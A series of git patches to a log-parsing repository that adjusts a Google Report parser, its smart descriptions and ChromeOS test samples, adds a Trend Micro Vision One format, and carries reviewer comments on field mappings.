@@ -0,0 +1,45 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + }, + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}" + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 
16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}", + "event": { + "action": "CHROME_OS_LOGIN_EVENT", + "category": [ + "web" + ], + "dataset": "admin#reports#activity", + "reason": "CHROMEOS_KIOSK_SESSION_LOGIN", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-08T13:20:40Z", + "cloud": { + "account": { + "id": "C01x7c000" + } + }, + "device": { + "model": { + "identifier": "S5NXNZ00A000000" + } + }, + "network": { + "application": "chrome" + }, + "organization": { + "name": "test_org" + }, + "user": { + "id": "105250506097973333333333" + } + } +} \ No newline at end of file From 3221f63e4467bb80d815c9e37e2ce48f95f74b44 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 16:27:24 +0100 Subject: [PATCH 29/84] Apply linter --- Google Cloud/google-report/ingest/parser.yml | 2 +- Google Cloud/google-report/tests/test_chrome_sample_1.json | 4 ++-- Google Cloud/google-report/tests/test_chrome_sample_2.json | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index c92e4bf32..2dde85fdb 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -290,7 +290,7 @@ stages: device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}' device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}' device.model.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_NAME" %}{{param.value}}{% endif %}{% endfor %}' - + - set: event.type: ["change"] filter: '{{ json_event.message.events[0].name == "CHROMEOS_PERIPHERAL_STATUS_UPDATED"}}' 
diff --git a/Google Cloud/google-report/tests/test_chrome_sample_1.json b/Google Cloud/google-report/tests/test_chrome_sample_1.json index 36c42d3d5..e0e145d54 100644 --- a/Google Cloud/google-report/tests/test_chrome_sample_1.json +++ b/Google Cloud/google-report/tests/test_chrome_sample_1.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}", "sekoiaio": { "intake": { "dialect": "Google Report", "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" } - }, - "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 
16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}" + } }, "expected": { "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}", diff --git a/Google Cloud/google-report/tests/test_chrome_sample_2.json b/Google Cloud/google-report/tests/test_chrome_sample_2.json index 49574fa28..ecbf27de3 100644 --- a/Google Cloud/google-report/tests/test_chrome_sample_2.json +++ b/Google Cloud/google-report/tests/test_chrome_sample_2.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}", "sekoiaio": { "intake": { "dialect": "Google Report", "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" } - }, - "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}" 
+ } }, "expected": { "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}", From f2dd3b05166600bb2e7e6a91ba6fc89cbbc6e400 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 16:44:12 +0100 Subject: [PATCH 30/84] Fix smart desc --- Google Cloud/google-report/_meta/smart-descriptions.json | 8 +++++++- Google Cloud/google-report/ingest/parser.yml | 2 +- 2 files changed, 8 insertions(+), 2 deletions(-) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 82e74ecd7..b58cf816e 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -174,6 +174,13 @@ { "field": "network.application", "value": "context_aware_access" + }, + { + "field": "google.report.access.application" + } + ] + }, + { "value": "The {google.report.rule.type} action was completed with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}", "conditions": [ { 
@@ -263,7 +270,6 @@ "field": "event.action" }, { - "field": "google.report.access.application" "field": "google.report.saml.application_name" } ] diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index f3b54b479..f928e2148 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -272,7 +272,7 @@ stages: event.type: ["denied"] device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_DEVICE_ID" %}{{param.value}}{% endif %}{% endfor %}' google.report.access.application: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_APPLICATION" %}{{param.value}}{% endif %}{% endfor %}' - + set_rules_fields: actions: - set: From 1e5f81194e4fe8d0f69df8ea7d743b39d35fd469 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Mon, 18 Nov 2024 10:47:49 +0100 Subject: [PATCH 31/84] Fix smart desc --- Google Cloud/google-report/_meta/smart-descriptions.json | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index b58cf816e..c1a559ed7 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -177,6 +177,12 @@ }, { "field": "google.report.access.application" + }, + { + "field": "user.email" + }, + { + "field": "event.action" } ] }, From 7478edd763b6ef7828fbc8cbf8e481b7aa1c2b1b Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Mon, 18 Nov 2024 11:27:09 +0100 Subject: [PATCH 32/84] Fix smart desc --- .../_meta/smart-descriptions.json | 22 ------------------- 1 file changed, 22 deletions(-) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index c1a559ed7..a25527ef8 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json 
+++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -293,9 +293,6 @@ }, { "field": "user.email" - }, - { - "field": "google.report.saml.application_name" } ] }, @@ -334,25 +331,6 @@ } ] }, - { - "value": "User {user.email} failed to log in using {network.application} service : {event.reason}", - "conditions": [ - { - "field": "network.application", - "value": "saml" - }, - { - "field": "event.action", - "value": "login_failure" - }, - { - "field": "user.email" - }, - { - "field": "google.report.saml.application_name" - } - ] - }, { "value": "{source.ip} with ID {user.id} changing in the {network.application} application", "conditions": [ From 65af5b12298e7c7884511b6f93260bf41fbc2b8b Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Mon, 18 Nov 2024 11:41:54 +0100 Subject: [PATCH 33/84] Add some modification to the parser --- .../google-report/_meta/smart-descriptions.json | 4 ++-- Google Cloud/google-report/ingest/parser.yml | 6 ++++-- .../google-report/tests/test_chrome_sample_1.json | 10 ++++++++-- .../google-report/tests/test_chrome_sample_2.json | 7 ++++--- 4 files changed, 18 insertions(+), 9 deletions(-) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 0ac5acfe5..0c49ccdf8 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -283,7 +283,7 @@ ] }, { - "value": "Device {device.model.name} with ID {device.id} is {event.action} in the {network.application} application", + "value": "Device {device.model.name} with model ID {device.model.identifier} is {event.action} in the {network.application} application", "conditions": [ { "field": "network.application", @@ -297,7 +297,7 @@ "field": "device.model.name" }, { - "field": "device.id" + "field": "device.model.identifier" } ] }, 
diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index 2dde85fdb..e15db634e 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -287,9 +287,11 @@ stages: event.category: ["web"] organization.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ORG_UNIT_NAME" %}{{param.value}}{% endif %}{% endfor %}' event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "EVENT_REASON" %}{{param.value}}{% endif %}{% endfor %}' - device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}' - device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}' + device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}' + host.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}' device.model.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_NAME" %}{{param.value}}{% endif %}{% endfor %}' + device.manufacturer: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "VENDOR_NAME" %}{{param.value}}{% endif %}{% endfor %}' + host.os.full: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_PLATFORM" %}{{param.value}}{% endif %}{% endfor %}' - set: event.type: ["change"] diff --git a/Google Cloud/google-report/tests/test_chrome_sample_1.json b/Google Cloud/google-report/tests/test_chrome_sample_1.json index e0e145d54..6567eebf1 100644 --- a/Google Cloud/google-report/tests/test_chrome_sample_1.json 
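Review bot: The hunk still leaves `DIRECTORY_DEVICE_ID` unmapped while `host.name` now takes `DEVICE_NAME`, which in both chrome test samples is a serial-like string (`S5NXNZ00A000000`); the directory device ID is presumably the identifier the Google admin directory uses for the device, so correlating these events with device inventory or other Google report events would want it on `host.id`. I would add `host.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DIRECTORY_DEVICE_ID" %}{{param.value}}{% endif %}{% endfor %}'` next to `host.name`. `DEVICE_USER` is also dropped; test_chrome_sample_2 shows it as `-` for a kiosk session, so if it is later mapped to `user.name` the `-` placeholder should be filtered out rather than indexed as a username. The enclosing `set_chrome_fields` stage starts before this hunk.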
+++ b/Google Cloud/google-report/tests/test_chrome_sample_1.json @@ -28,12 +28,18 @@ } }, "device": { - "id": "0x2", + "manufacturer": "Linux Foundation", "model": { - "identifier": "S5NXNZ00A000000", + "identifier": "0x2", "name": "2.0 root hub" } }, + "host": { + "name": "S5NXNZ00A000000", + "os": { + "full": "ChromeOS 16033.51.0" + } + }, "network": { "application": "chrome" }, diff --git a/Google Cloud/google-report/tests/test_chrome_sample_2.json b/Google Cloud/google-report/tests/test_chrome_sample_2.json index ecbf27de3..990b7f47c 100644 --- a/Google Cloud/google-report/tests/test_chrome_sample_2.json +++ b/Google Cloud/google-report/tests/test_chrome_sample_2.json @@ -27,9 +27,10 @@ "id": "C01x7c000" } }, - "device": { - "model": { - "identifier": "S5NXNZ00A000000" + "host": { + "name": "S5NXNZ00A000000", + "os": { + "full": "ChromeOS 16033.51.0" } }, "network": { From 4c329f6eb9002b66e9c6bef52e60f7c1c340ecf0 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Mon, 18 Nov 2024 12:27:34 +0100 Subject: [PATCH 34/84] Fix smart desc --- .../_meta/smart-descriptions.json | 32 +++++++++++++++++-- 1 file changed, 30 insertions(+), 2 deletions(-) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 66d518071..81622bd9b 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -352,7 +352,7 @@ ] }, { - "value": "The user on device model {device.model.name} logged out due to {event.reason}", + "value": "The user with ID {user.id} on the {device.model.name} device logged out due to: {event.reason}", "conditions": [ { "field": "network.application", 
@@ -367,11 +367,14 @@ }, { "field": "device.model.name" + }, + { + "field": "user.id" } ] }, { - "value": "The user on device model {device.model.name} log in due to {event.reason}", + "value": "The user with id {user.id} on the {device.model.name} device log in : {event.reason}", "conditions": [ { "field": "network.application", @@ -386,6 +389,31 @@ }, { "field": "device.model.name" + }, + { + "field": "user.id" + } + ] + }, + { + "value": "The user with id {user.id} on the {host.name} host log in : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROME_OS_LOGIN_EVENT" + }, + { + "field": "event.reason" + }, + { + "field": "device.model.name" + }, + { + "field": "user.id" } ] }, From 90a003cc629a1666e04ae08bd97a170fb0c27cfe Mon Sep 17 00:00:00 2001 
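Review bot: The new description entry whose value renders `{host.name}` (third hunk) conditions on `"field": "device.model.name"` instead of `"field": "host.name"`, so it can be selected for an event whose `host.name` is empty and the rendered sentence has a hole; that condition should read `"field": "host.name"`. Its condition list is otherwise identical to the preceding `{device.model.name}` entry, so presumably whichever the matcher evaluates first shadows the other — if the host-based text is meant as a fallback for events without a model name, it should not require `device.model.name` at all. Wording also drifts between the edited entries (`with ID` vs `with id`, `logged out due to:` vs `log in :`); `The user with ID {user.id} on the {host.name} host logged in: {event.reason}` would match the logout entry's register. The same inconsistency applies to the second hunk's `log in :` value.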
From: lvoloshyn-sekoia Date: Tue, 19 Nov 2024 09:48:10 +0200 Subject: [PATCH 35/84] Add format for Trend Micro Vision One --- .../trend-micro-vision-one/CHANGELOG.md | 8 ++ .../trend-micro-vision-one/_meta/fields.yml | 29 +++++++ .../trend-micro-vision-one/_meta/logo.png | Bin 0 -> 10452 bytes .../trend-micro-vision-one/_meta/manifest.yml | 9 ++ .../_meta/smart-descriptions.json | 0 .../trend-micro-vision-one/ingest/parser.yml | 79 ++++++++++++++++++ .../tests/test_process.json | 66 +++++++++++++++ .../tests/test_registry.json | 72 ++++++++++++++++ 8 files changed, 263 insertions(+) create mode 100644 Trend Micro/trend-micro-vision-one/CHANGELOG.md create mode 100644 Trend Micro/trend-micro-vision-one/_meta/fields.yml create mode 100644 Trend Micro/trend-micro-vision-one/_meta/logo.png create mode 100644 Trend Micro/trend-micro-vision-one/_meta/manifest.yml create mode 100644 Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json create mode 100644 Trend Micro/trend-micro-vision-one/ingest/parser.yml create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_process.json create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_registry.json diff --git a/Trend Micro/trend-micro-vision-one/CHANGELOG.md b/Trend Micro/trend-micro-vision-one/CHANGELOG.md new file mode 100644 index 000000000..11bddf32c --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/CHANGELOG.md @@ -0,0 +1,8 @@ +# Changelog + +All notable changes to this project will be documented in this file. + +The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), +and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). + +## [Unreleased] diff --git a/Trend Micro/trend-micro-vision-one/_meta/fields.yml b/Trend Micro/trend-micro-vision-one/_meta/fields.yml new file mode 100644 index 000000000..f18d3cb5d --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/_meta/fields.yml 
@@ -0,0 +1,29 @@
+trendmicro.vision_one.alert_id:
+ description: ''
+ name: trendmicro.vision_one.alert_id
+ type: keyword
+
+trendmicro.vision_one.case_id:
+ description: ''
+ name: trendmicro.vision_one.case_id
+ type: keyword
+
+trendmicro.vision_one.incident_id:
+ description: ''
+ name: trendmicro.vision_one.incident_id
+ type: keyword
+
+trendmicro.vision_one.investigation_status:
+ description: ''
+ name: trendmicro.vision_one.investigation_status
+ type: keyword
+
+trendmicro.vision_one.severity:
+ description: ''
+ name: trendmicro.vision_one.severity
+ type: keyword
+
+trendmicro.vision_one.status:
+ description: ''
+ name: trendmicro.vision_one.status
+ type: keyword
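Review bot: All six custom field declarations carry `description: ''`, so the schema tells an analyst nothing about what each field holds. The parser added in this commit (ingest/parser.yml) fills them from the alert's `id`, `caseId`, `incidentId`, `investigationStatus`, `severity` and `status` attributes, so a one-line description each is enough, e.g. `description: 'Identifier of the Vision One Workbench alert'` for `alert_id` and `description: 'Investigation status of the alert as reported by Vision One'` for `investigation_status`.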
diff --git a/Trend Micro/trend-micro-vision-one/_meta/logo.png b/Trend Micro/trend-micro-vision-one/_meta/logo.png new file mode 100644 index 0000000000000000000000000000000000000000..e51bb3eb7725123b5278a71034969dfbbd5ca157 GIT binary patch literal 10452 zcmXwfby$?&^Y((2Gzci&B@0LkNS8E{OLv!a2-4CaNDB%`2up{s5(`L4Ni9kWf^?Vk z@9_D)?;l=V?ml~-Iro{l=bo7ptEHhtfJ=o7fj|h9pUZ1QAZXCLe>hm+lYrnP9|(ja zS6N<0*Z=*_e2A{`S~mNBHM~rptU2|wwL#-cd9N8mhFK1KJ5-h^ZQ9=yPyXR|P@Zgm zfxZ-ijZxEmehu-wW?^-)v|c;nuk*goM((e$YzcmQPuw^1#8Ugub`_ucEBGg@85V;JvodH5z(qM(+;|%N1wAyRR1Uh-GmYBZ&jDVGpGn zG|7761oQujWUIZ7Qe_lV3R9qnEnJ8Ejtw>>+1z~Nzca&a_jR6@^3k`hp@ia08stKqO((_2Ri2IvM#UCaXzvEq zqTSqFXd)&wkk=q^3S40ksb@gyw_|3ElApV^UdLaPS?;i}^V z&W`sbPn15K;hA4Lg_y0HR%fY|(4mChPIA;dWr-`i{9~REzxg+b9O)mp{ZsJb-61rJ zXAa=j2>@I-T%3Ep)WeAj)rcuvZwAZf-Yx&eTvCOxCxy%`Al-a-prW-RuO#v6BhpHZ ztY?!;N~+;#)3~FmWP>gQEcMgb`ATGA$+2T&a5m6k=b z-G07XbMpNt8m2x)Rr~eq<`30**GV<@Z176U`4Q~4^RtBs*+E8rrLc6g7i1C-DtBB9 zs&;XW@})iBhU`gn=62kQa63yGtk{~yXJ}az%aAGbO;%LzHiQdFei;{?IY? 
zwL1Ovwgt7&)O}uuhQ`#Td#Yp#XY$Uk`c?`EH}yz(=8ub|@D{H87AraqPD2*E5fmtV zTA0D&jqAxO{q3hee{QcsXyML`EadeJ7TphCz1p7Ls}MQNmY2iI0EfEKE;7R-iPBcW zla9^6xjk^c8NF%Pku2I3aBoJEDvSx-EVfURT=b~Y0X$OgqQUKEcK&O^&lC||i!rj4 z^(aH){f*weW3r%%PA#2p)UbyiGxo>+xIUz6pO@E>F2p`sdcq@dLo`*tcP;gWBkn{o zn`!fPBx_uubz$SRtr*_(X=q zUz!I88+3O2n4uaul)r?X9DJT2rw<6Z;6JH|d69*QCL(p(HsTY~R+R6g=7JWF7>U3e9q zOL%jvA(1CDsbB$Er1|)tl()(Gd4bcN2l4%n5#ya703Pj;vSXxoR#hbvEg`dct5aG_ zOlWQAfKhKB{dO3;b~R(TlR(PO-Jd*dwN522%#^?XfyNu55J{< zxUL6a${T-rX=H4K4v4RY3<1l0R~z;6(OaE}tj%EBw_!4$jL2NMxxp38U(3f zg&bld!8=>*RqZF#L|aBUw=S!;HLmk@|Gv-xAebko5bQ#6 zIH^dBX1f>P6$kG%G74`kS24xbeLT??jN?Pwsq4O&+Gm}Mj#|7DQO|REJec?w9X!cm zMG@H(`n|e*rTpyM_#6xZs7Q@&6Xr7GEZQJQ4kOcN$uIs9bycnc2$4+Oy7VF5(vvEh zO&C5;J;QH-%Ud(A3Atg6JCByWW@cYUNLv@Bd`~1Z0nCu&^39p4#$hA8mXlKZAYLSG z%$mr>4H|l2nry{L*87Hjr{$>Ru9ro~VfpTxwkEd9H6<)8zE{4Fyuze4xVly?IK6}GnpEZN*&lXUMkdn{iO~gx 